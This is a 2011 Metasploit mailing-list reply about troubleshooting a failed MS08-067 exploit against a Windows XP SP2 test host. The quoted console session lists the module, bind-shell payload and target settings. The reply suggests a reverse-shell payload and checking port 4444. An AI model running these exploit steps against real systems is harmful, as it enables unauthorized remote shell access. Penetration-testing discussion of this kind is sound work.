[framework] ASK: Exploit completed, but no session was created

Jose Selvi jselvi at pentester.es
Sat Mar 12 11:52:56 PST 2011 

Target isn't vulnerable or you can't establish a connection.
Maybe the XP firewall is blocking incoming connections to 4444/tcp.

Why don't you try to use another payload? a reverse one.
If it's a test machine you can also try to look if there ir any 
listening process at 4444/tcp with netstat. If not, probably target 
isn't vulnerable.

Good luck.
Regards.

El 12/03/11 15:21, Dodi Ara escribió:
> msf>  use exploit/windows/smb/ms08_067_netapi
> msf exploit(ms08_067_netapi)>  set payload windows/shell_bind_tcp
> payload =>  windows/shell_bind_tcp
> msf exploit(ms08_067_netapi)>  set RHOST 192.168.1.1
> RHOST =>  192.168.1.11
> msf exploit(ms08_067_netapi)>  show options
>
> Module options (exploit/windows/smb/ms08_067_netapi):
>
>     Name     Current Setting  Required  Description
>     ----     ---------------  --------  -----------
>     RHOST    192.168.1.11     yes       The target address
>     RPORT    445              yes       Set the SMB service port
>     SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
>
>
> Payload options (windows/shell_bind_tcp):
>
>     Name      Current Setting  Required  Description
>     ----      ---------------  --------  -----------
>     EXITFUNC  thread           yes       Exit technique: seh, thread,
> none, process
>     LPORT     4444             yes       The listen port
>     RHOST     192.168.1.11     no        The target address
>
>
> Exploit target:
>
>     Id  Name
>     --  ----
>     0   Automatic Targeting
>
>
> msf exploit(ms08_067_netapi)>  exploit
>
> [*] Started bind handler
> [*] Automatically detecting the target...
> [*] Fingerprint: Windows XP - Service Pack 2 - lang:English
> [*] Selected Target: Windows XP SP2 English (NX)
> [*] Attempting to trigger the vulnerability...
> [*] Exploit completed, but no session was created.
> msf exploit(ms08_067_netapi)>
>
> -------------------------
> why metasploit doesn't succesfuly?
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework

-- 
Jose Selvi.
Security Technical Consultant
CISA, CISSP, CNAP, GCIH, GPEN

http://www.pentester.es

SANS Mentor in Madrid (Spain). September 23 - November 25
SEC560: Network Penetration Testing and Ethical Hacking
http://www.sans.org/mentor/details.php?nid=24133
http://www.pentester.es/2010/12/nuevo-grupo-y-descuento-para-network.html

More information about the framework mailing list